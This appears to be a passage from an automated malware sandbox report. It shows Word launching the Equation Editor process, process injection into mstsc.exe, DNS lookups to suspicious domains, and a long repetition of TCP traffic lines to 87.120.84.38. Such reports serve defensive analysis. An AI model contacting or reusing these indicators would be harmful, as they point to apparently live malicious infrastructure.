Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_009420E2 PathFindFileNameW,PathAppendW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,FindNextFileW,PathAppendW,FindNextFileW,FindClose

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then pop esi | 10_2_000972F9
Source: global traffic | DNS query: name: www.education2jobs.com
Source: global traffic | DNS query: name: www.lifeofthobes.uk
Source: global traffic | DNS query: name: www.thecareskin.com
Source: global traffic | DNS query: name: www.opmk.monster
Source: global traffic | DNS query: name: www.affirmationtotebags.com
Source: global traffic | DNS query: name: www.mbbwa4wp.cfd
Source: global traffic | DNS query: name: www.fcno30.com
Source: global traffic | DNS query: name: www.ko-or-a-news.com
Source: global traffic | DNS query: name: www.launchyouglobal.com
Source: global traffic | DNS query: name: www.trygenesisx.com
Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 13.248.213.45:80
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 68.66.226.117:80
Source: global traffic | TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
